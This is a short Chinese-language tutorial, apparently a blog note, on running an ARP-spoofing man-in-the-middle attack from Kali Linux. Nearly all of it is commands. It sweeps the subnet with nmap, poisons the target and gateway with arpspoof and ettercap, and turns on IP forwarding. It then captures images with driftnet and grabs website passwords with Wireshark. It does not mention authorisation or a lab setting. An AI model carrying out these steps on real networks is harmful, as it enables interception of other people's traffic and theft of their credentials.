查看所属内网网段
ifconfig查看自己的ip为222.222.221.140
nmap扫描内网ip
nmap -sP 222.222.221.0/24
扫描出内网所有的IP
开启ARP欺骗
kali欺骗目标机器说自己是222.222.221.107,同时欺骗网关说自己是222.222.221.138。开启欺骗后目标主机会不能上网,因为数据包转发到你这里了。
arpspoof -i eth0 -t 222.222.221.138 -r 222.222.221.107
arpspoof命令
后面接上与网络有关的-i(interface)
网卡eth0
目标-t(target)
目标IP:222.222.221.138
目标主机网关222.222.221.107
开启转发
这时目标主机138又可以正常上网。
cat /proc/sys/net/ipv4/ip_forward echo 1 >> /proc/sys/net/ipv4/ip_forward cat /proc/sys/net/ipv4/ip_forward
截获数据包
ettercap -T -q -M ARP /222.222.221.138// ///
直接显示图片
driftnet -i eth0
wireshark抓取数据
截取数据包可以直接用wireshark抓取指定网站密码
参考:https://cloud.tencent.com/developer/news/103648